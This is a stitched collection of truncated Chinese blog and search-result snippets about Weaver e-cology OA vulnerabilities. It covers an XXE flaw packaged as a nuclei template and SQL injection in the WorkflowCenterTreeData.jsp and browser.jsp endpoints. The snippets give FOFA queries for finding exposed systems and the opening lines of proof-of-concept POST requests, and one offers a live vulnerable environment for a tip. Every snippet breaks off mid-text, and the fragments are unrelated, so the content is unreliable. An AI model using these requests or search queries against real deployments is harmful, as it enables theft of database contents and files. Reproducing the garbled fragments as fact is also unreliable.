nuclei批量yaml文件 id:ecology-XXE-QVD-2023-16177info:name:泛微E-CologyXXE漏洞author:mhb17severity:criticaldescription:泛微e-cology某处功能点最初针对用户输入的过滤不太完善,导致在处理用户输入时可触发XXE。后续修复规则依旧可被绕过,本次漏洞即为之前修复规则的绕过。攻击者可利用该漏洞列目录、读取文件,甚至可...
如果想本地搭建环境复现可见https://github.com/jas502n/e-cology 上一篇使用Telnet伪造邮件发送 下一篇XXE漏洞初步练手 本文作者:aw4ker 本文链接:https://www.cnblogs.com/aw4ker/p/11650528.html 版权声明:本作品采用知识共享署名-非商业性使用-禁止演绎 2.5 中国大陆许可协议进行许可。 关注我 收藏该文...
公众号内回复“泛微环境” 0x04 漏洞利用 找到oracle数据库的泛微OA系统后直接使用Poc(已公开) 如果不存在漏洞,则显示结果如下 如果漏洞存在,则会直接回显很多数据 简洁版Poc如下:(勿用于非法途径) 代码语言:javascript 复制 POST/mobile/browser/WorkflowCenterTreeData.jsp?node=wftype_1&scope=2333HTTP/1.1Host:i...
该漏洞是由于OA系统的WorkflowCenterTreeData接口在收到用户输入的时候未进行安全过滤,oracle数据库传入恶意SQL语句,导致SQL漏洞。 0x02 影响范围 使用oracle数据库的泛微 e-cology OA 系统 0x03 环境搭建 在线环境(限今晚): 打赏(任意金额)+转发,联系作者获取 FOFA搜索: app="泛微-协同办公OA" 自行搭建: 公众号...
漏洞复现 泛型微生态OA系统的WorkflowCenterTreeData接口在使用Oracle数据库时,由于内置sql语句分解不严密,导致其存在的sql注入漏洞 POC: POST /mobile/browser/WorkflowCenterTreeData.jsp?node=wftype_1&scope=2333 HTTP/1.1 Host: ip:port Cache-Control: max-age=0 ...
泛微e-cology9存在SQL注入漏洞,攻击者可利用该漏洞获取数据库敏感信息。 影响版本 泛微e-cology V9<10.56 漏洞复现 fofa语法:app="泛微-协同商务系统" 登录页面: POC: POST /mobile/%20/plugin/browser.jsp HTTP/1.1Host: User-Agent: Mozilla/5.0(Windows NT10.0; Win64; x64; rv:109.0) Gecko/20100101Fire...